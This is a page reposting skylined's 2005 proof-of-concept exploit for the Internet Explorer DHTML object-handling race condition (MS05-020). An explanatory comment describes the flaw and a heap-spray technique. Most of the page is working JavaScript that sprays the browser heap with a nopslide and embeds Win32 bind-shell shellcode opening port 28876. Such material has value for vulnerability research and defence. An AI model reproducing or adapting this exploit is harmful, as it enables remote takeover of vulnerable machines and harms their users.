首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer DHTML Object handling Exploit (MS05-020)
来源:http://www.edup.tudelft.nl/~bjwever 作者:skylined 发布时间:2005-04-13  

Microsoft Internet Explorer DHTML Object handling Exploit (MS05-020)

<HTML><!--
___________________________________________________________________

,sSSSs, Ss, Internet Exploiter 2 v0.1
SS" `YS' '*Ss. MSIE R6025 Multithreading issue PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever
`"YSSP" sSS <skylined@edup.tudelft.nl>
___________________________________________________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.

The vulnerability:
There is a race condition when using appendChild to append an element in one
window to an element in another. A "dirty" read can be exploited to gain
control over the process. The control can be gained because of this code:

MSHTML.DLL @ 0x635F6074 (win2ksp4en)
MOV EAX, DWORD PTR [ESP+4] ; EAX = Some pointer to the heap for mshtml
MOV EAX, DWORD PTR [EAX] ; EAX = "dirty" value from heap
JMP NEAR DWORD PTR [EAX+8] ; Jmp to memory pointed to by "dirty" value

This is how we exploit it:
- To get some control over the "dirty" value we try to "spray" the heap for
mshtml with the value we want it to read. This is done with creatComment()s
that contain a string full of our value. We want to spray effectve and
fast, so we use as big a string as possible. If we use a string over 512
bytes long, mshtml will write a pointer to the string instead of the string
itself.
- To jump to the right address, we have to make sure that the "dirty" value
points to a pointer that in turn points to the address we want to jump to.

The first part of the exploit will provide for all this in creating a
number of dwords around 0x0D0D0D0D that all point to 0x0D0D0D0D. So if we
"spray" the heap for mshtml with 0x0D0D0D0D, this is what will happen:

MSHTML.DLL @ 0x635F6074 (win2ksp4en)
MOV EAX, DWORD PTR [ESP+4] ; EAX = Some pointer to the heap fot mshtml
MOV EAX, DWORD PTR [EAX] ; EAX = 0x0D0D0D0D
JMP NEAR DWORD PTR [EAX+8] ; JMP [0x0D0D0D15] = JMP 0x0D0D0D0D
HEAP @ 0x0D0D0D0D
OR EAX, 0x0D0D0D0D
OR EAX, 0x0D0D0D0D
OR EAX, 0x0D0D0D0D
...nopslide...
shellcode

This has proven to work quite reliable. Allthough testing showed that there
is a chance we do not control the "dirty" value. In this case, the "dirty"
value seems to be 0x11CF03f9 a lot of the time, so we make sure we cover
that address with the '0D' nopslide-landingzone too.
-->

<SCRIPT id="SkyLined" language="javascript">
sMSHTML_heap_spray = unescape("%u0D0D%u0D0D");
for (i=0; i<7; i++) // 512 bytes
sMSHTML_heap_spray += sMSHTML_heap_spray;
try {
// We need to have an element in another window, so we try to create
// one in the window that opened us. This will most likely fail
// the first time because of XSS restrictions. In that case we open
// this page in a new window and try again from there.
exploit(opener.document.createComment(sMSHTML_heap_spray));
} catch(e) {
// both open() and showHelp() work with this
window.open(document.location.href);
}

function exploit(parent_element) {
// cosmetics, this window will DIE, so we move it out of view.
opener.focus();
window.moveTo(100000, 100000);

iHeap_fill_to_address = 0x12000000;
sHeap_return_address = unescape("%u0D0D%u0D0D");

// 4 nops because the 0x0D slide has 5 byte instructions.
sShellcode = unescape("%u3737%u3737" +
// Win32 bindshell (port 28876, '\0' free, looping). Thanks to
// HDM and others for inspiration and borrowed code. Source:
// www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c
"%u43eb"+"%u5756"+"%u458b"+"%u8b3c"+"%u0554"+"%u0178"+"%u52ea" +
"%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf" +
"%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b" +
"%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" +
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850" +
"%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff" +
"%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22" +
"%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6" +
"%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe" +
"%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031" +
"%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56" +
"%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964" +
"%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" +
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343" +
"%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031" +
"%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b" +
"%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
// We are going to create a large block the will contain:
// [heap header][nopslide...........................][shellcode]
// by creating an array with a number of large strings that contain
// the nopslide and the shellcode. We will do this in such a way that
// one heap block is allocated for every string (by making it at least
// 0x80000 bytes) and try to use every byte of the heap block by making
// the nopslide fill the area between the heap header and shellcode
// precisely.
// Size of the header of heap blocks in MSIE in bytes:
iHeap_header_size = 0x38; // Actually it's 0x24, but this value works better
// Size of the blocks we want to create in bytes:
iHeap_block_size = 0x400000;
// Size of the shellcode in bytes:
iShellcode_size = sShellcode.length * 2; // (convert dwords to bytes)
// From this we can calculate the size of the nopslide in bytes:
iNopslide_size = iHeap_block_size - (iHeap_header_size + iShellcode_size);
// The quickest way to create large blocks of memory is doubling their
// size untill they are big enough (or too big, in which case we cut
// them back to size.)
sNopslide = sHeap_return_address;
while (sNopslide.length*2<iNopslide_size) sNopslide+=sNopslide;
sNopslide = sNopslide.substring(0, iNopslide_size/2);
// And now we can combine the nopslide and shellcode to create the heap
// blocks, we'll create enough to make sure we've got one at the
// desired return address: If we could calculate where the first one
// will be allocated, we could create exactly enough blocks, for now
// we assume they won't start under 0x400000 so we make sure we
// create enough for that value.
iHeap_block_count = (iHeap_fill_to_address-0x400000) / iHeap_block_size;
memory = new Array();
for (i=0;i<iHeap_block_count;i++) memory[i] = sNopslide + sShellcode;

sMSHTML_heap_spray = sNopslide.substring(0, 0x100); // 0x100 dwords = 512 bytez
for(i=0;i<1024;i++) try {
parent_element.appendChild(document.createComment(sMSHTML_heap_spray));
} catch (e) { }
}
</SCRIPT>
</HTML>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Jet Database Engine
·Oracle Database Server MDSYS.M
·Microsoft Jet Database Engine
·Oracle Database PL/SQL Stateme
·IBM Lotus Domino Server Web Se
·Salim Gasmi GLD Postfix Greyli
·PunBB <= v1.2.4 change_emai
·Multiple Debuggers Security By
·Linux kernel 2.4/2.6 Bluetooth
·Sumus v0.2.2 httpd Component R
·phpBB Calendar Pro catergory P
·Sendmail <= 8.12.9 remote e
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved